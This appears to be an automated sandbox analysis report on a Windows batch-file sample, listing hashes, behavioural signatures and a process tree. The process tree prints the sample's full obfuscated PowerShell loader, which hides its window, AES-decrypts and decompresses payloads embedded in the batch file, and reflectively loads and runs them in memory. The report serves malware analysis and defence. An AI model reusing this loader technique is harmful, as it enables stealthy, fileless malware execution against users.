Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-04-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
Resource
win7-20240221-en
3 signatures
150 seconds
General
-
Target
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
-
Size
61KB
-
MD5
28de2826893ab7e1f2c97521e8fb8ef7
-
SHA1
50a03746f808599f6ea91b176bc1621c21911eeb
-
SHA256
40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1
-
SHA512
28f6268cb2944b2d9c76d35d0df6e23e02242bbf5d0a1556b585321a166bd3694cc2e78347d98df4ba1502d397654243ccce10b0935c92076fe12c67f688c451
-
SSDEEP
1536:NkwiNwg9/Sdqu+PZuFehHoCWryzg8jLVJTMdqEpo/LBfG:PiNw60+PZu+ICSXGxJTE8VfG
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2120 wrote to memory of 2508 2120 cmd.exe 29 PID 2120 wrote to memory of 2508 2120 cmd.exe 29 PID 2120 wrote to memory of 2508 2120 cmd.exe 29 PID 2508 wrote to memory of 2524 2508 cmd.exe 31 PID 2508 wrote to memory of 2524 2508 cmd.exe 31 PID 2508 wrote to memory of 2524 2508 cmd.exe 31 PID 2508 wrote to memory of 2556 2508 cmd.exe 32 PID 2508 wrote to memory of 2556 2508 cmd.exe 32 PID 2508 wrote to memory of 2556 2508 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "3⤵PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-